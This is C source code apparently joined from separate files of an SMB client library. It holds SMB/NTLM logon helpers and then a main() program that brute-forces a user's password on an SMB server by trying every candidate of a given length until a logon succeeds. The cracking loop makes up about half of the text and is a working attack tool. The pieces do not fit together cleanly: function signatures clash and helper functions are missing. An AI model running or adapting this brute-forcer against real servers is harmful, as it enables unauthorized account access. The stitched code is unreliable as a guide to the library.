/* returns 0 on success, > 0 on failure */ static int init_challenge(char *domain, char *domain_controller) { int smberr; if (handle != NULL) { return 0; } debug("Connecting to server %s domain %s\n", domain_controller, domain); handle = SMB_Connect_Server(NULL, domain_controller, domain); smberr = SMB_Get_Last_Error(); SMB_Get_Error_Msg(smberr, errstr, 1000); if (handle == NULL) { /* couldn't connect */ debug("Couldn't connect to SMB Server. Error:%s\n", errstr); return 1; } if (SMB_Negotiate(handle, SMB_Prots) < 0) { /* An error */ debug("Error negotiating protocol with SMB Server\n"); SMB_Discon(handle, 0); handle = NULL; return 2; } if (handle->Security == 0) { /* share-level security, unuseable */ debug("SMB Server uses share-level security .. we need user security.\n"); SMB_Discon(handle, 0); handle = NULL; return 3; } memcpy(challenge, handle->Encrypt_Key, NONCE_LEN); SMBencrypt((unsigned char *)"",challenge,lmencoded_empty_pass); SMBNTencrypt((unsigned char *)"",challenge,ntencoded_empty_pass); return 0; }
/* Tries to connect to a DC. Returns 0 on failure, 1 on OK */ int is_dc_ok(char *domain, char *domain_controller) { SMB_Handle_Type h = SMB_Connect_Server(NULL, domain_controller, domain); if (h == NULL) return 0; SMB_Discon(h, 0); return 1; }
int Valid_User(char *USERNAME, char *PASSWORD, char *SERVER, char *BACKUP, char *DOMAIN) { int pass_is_precrypted_p = 0; char *SMB_Prots[] = { /* "PC NETWORK PROGRAM 1.0", */ /* "MICROSOFT NETWORKS 1.03", */ /* "MICROSOFT NETWORKS 3.0", */ "LANMAN1.0", "LM1.2X002", "Samba", /* "NT LM 0.12", */ /* "NT LANMAN 1.0", */ NULL}; SMB_Handle_Type con; SMB_Init(); con = SMB_Connect_Server(NULL, SERVER, DOMAIN); if (con == NULL) { /* Error ... */ con = SMB_Connect_Server(NULL, BACKUP, DOMAIN); if (con == NULL) { return (NTV_SERVER_ERROR); } } if (SMB_Negotiate(con, SMB_Prots) < 0) { /* An error */ SMB_Discon(con, 0); return (NTV_PROTOCOL_ERROR); } /* Test for a server in share level mode do not authenticate against it */ if (con->Security == 0) { SMB_Discon(con, 0); return (NTV_PROTOCOL_ERROR); } if (SMB_Logon_Server(con, USERNAME, PASSWORD, DOMAIN, pass_is_precrypted_p) < 0) { SMB_Discon(con, 0); return (NTV_LOGON_ERROR); } SMB_Discon(con, 0); return (NTV_NO_ERROR); }
void * NTLM_Connect(char *SERVER, char *BACKUP, char *DOMAIN, char *nonce) { char *SMB_Prots[] = { /* "PC NETWORK PROGRAM 1.0", */ /* "MICROSOFT NETWORKS 1.03", */ /* "MICROSOFT NETWORKS 3.0", */ "LANMAN1.0", "LM1.2X002", "Samba", /* "NT LM 0.12", */ /* "NT LANMAN 1.0", */ NULL}; SMB_Handle_Type con; SMB_Init(); con = SMB_Connect_Server(NULL, SERVER, DOMAIN); if (con == NULL) { /* Error ... */ con = SMB_Connect_Server(NULL, BACKUP, DOMAIN); if (con == NULL) { return (NULL); } } if (SMB_Negotiate(con, SMB_Prots) < 0) { /* An error */ SMB_Discon(con, 0); return (NULL); } /* Test for a server in share level mode do not authenticate against it */ if (con->Security == 0) { SMB_Discon(con, 0); return (NULL); } memcpy(nonce, con->Encrypt_Key, 8); return (con); }
main(int argc, char *argv[]) { void *con, *tree; extern char *optarg; extern int optind; int opt, error, SMB_Error, err_class, err_code, pwlen, tries = 0; char server[80], service[80], service_name[160], password[80], username[80]; char old_password[80], err_string[1024]; server[0] = 0; strncpy(service, "IPC$", sizeof(service) - 1); service_name[0] = 0; username[0] = 0; password[0] = 0; old_password[0] = 0; while ((opt = getopt(argc, argv, "s:u:l:v")) != EOF) { switch (opt) { case 's': strcpy(service, optarg); break; case 'u': /* Pick up the user name */ strncpy(username, optarg, sizeof(username) - 1); break; case 'l': /* pick up password len */ pwlen = atoi(optarg); break; case 'v': /* Verbose? */ verbose = TRUE; break; default: usage(); exit(1); break; } } if (optind < argc) { /* Some more parameters, assume is the server */ strncpy(server, argv[optind], sizeof(server) - 1); optind++; } else { strcpy(server, "nemesis"); } if (verbose == TRUE) { /* Print out all we know */ fprintf(stderr, "Finding password for User: %s, on server: %s\n", username, server); fprintf(stderr, "with a pwlen = %i\n", pwlen); } SMB_Init(); /* Initialize things ... */ /* We connect to the server and negotiate */ con = SMB_Connect_Server(NULL, server); if (con == NULL) { /* Error processing */ fprintf(stderr, "Unable to connect to server %s ...\n", server); if (SMB_Get_Last_Error() == SMBlibE_Remote) { SMB_Error = SMB_Get_Last_SMB_Err(); SMB_Get_SMB_Error_Msg(SMBlib_Error_Class(SMB_Error), SMBlib_Error_Code(SMB_Error), err_string, sizeof(err_string) - 1); } else { SMB_Get_Error_Msg(SMB_Get_Last_Error(), err_string, sizeof(err_string) - 1); } printf(" %s\n", err_string); exit(1); } /* We need to negotiate a protocol better than PC NetWork Program */ if (SMB_Negotiate(con, SMB_Prots) < 0) { fprintf(stderr, "Unable to negotiate a protocol with server %s ...\n", server); if (SMB_Get_Last_Error() == SMBlibE_Remote) { SMB_Error = SMB_Get_Last_SMB_Err(); SMB_Get_SMB_Error_Msg(SMBlib_Error_Class(SMB_Error), SMBlib_Error_Code(SMB_Error), err_string, sizeof(err_string) - 1); } else { SMB_Get_Error_Msg(SMB_Get_Last_Error(), err_string, sizeof(err_string) - 1); } printf(" %s\n", err_string); exit(1); } sprintf(service_name, "\\\\%s\\%s", server, service); /* Could blow up */ /* Now loop through all password possibilities ... */ memset(password, 0, sizeof(password)); while (next_password(password, pwlen) == TRUE) { if ((tree = SMB_Logon_And_TCon(con, NULL, username, password, service_name, "?????")) == NULL) { if (verbose == TRUE) { /* Lets hear about the error */ fprintf(stderr, "Unable to logon and tree connect to server %s ...\n", server); fprintf(stderr, "With username: %s, and password: %s\n", username, print_password(password)); if (SMB_Get_Last_Error() == SMBlibE_Remote) { SMB_Error = SMB_Get_Last_SMB_Err(); SMB_Get_SMB_Error_Msg(SMBlib_Error_Class(SMB_Error), SMBlib_Error_Code(SMB_Error), err_string, sizeof(err_string) - 1); } else { SMB_Get_Error_Msg(SMB_Get_Last_Error(), err_string, sizeof(err_string) - 1); } printf(" %s\n", err_string); } } else { /* Password match */ fprintf(stderr, "Logged in with password:%s\n", print_password(password)); /* Exit now ... */ exit(0); } } fprintf(stderr, "Passwords exhausted."); }